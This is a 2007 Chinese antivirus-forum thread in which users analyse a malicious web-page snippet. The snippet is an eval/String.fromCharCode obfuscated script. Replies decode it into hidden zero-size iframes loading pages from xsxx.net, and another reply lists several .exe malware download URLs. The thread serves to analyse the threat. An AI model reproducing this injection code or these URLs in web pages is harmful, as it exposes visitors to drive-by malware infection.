瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 请版主进来分析一下这段网页恶意代码

jackylee12345 - 2007-3-17 0:06:00

<script>
t="60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,120,115,120,120,46,110,101,116,47,73,109,97,103,101,115,47,80,111,112,109,101,110,117,47,103,122,46,104,116,109,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,13,10,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,120,115,120,120,46,110,101,116,47,73,109,97,103,101,115,47,80,111,112,109,101,110,117,47,49,51,99,109,100,46,104,116,109,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>

mopery - 2007-3-17 1:04:00

<iframe src="http://www.xsxx.net/Images/Popmenu/gz.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.xsxx.net/Images/Popmenu/13cmd.htm" width="0" height="0" frameborder="0"></iframe>

mopery - 2007-3-17 1:17:00

下载
http://www.xsxx.net/Images/Popmenu/gz.exe
http://chengucf.dx1.hihost.org/Install.exe
http://www.chwtw.com/js/js.exe
http://chengucf.dx1.hihost.org/2006.exe
http://www.xsxx.net/Images/Popmenu/13cmd.exe

jackylee12345 - 2007-3-17 10:25:00

果然强.能说一下你是怎么分析得出来的结果吗? 我看着就只是一窜数字而已?顺便问一下,上面的那些数字是不是代表了ASCII码?

1

查看完整版本: 请版主进来分析一下这段网页恶意代码

© 2000 - 2026 Rising Corp. Ltd.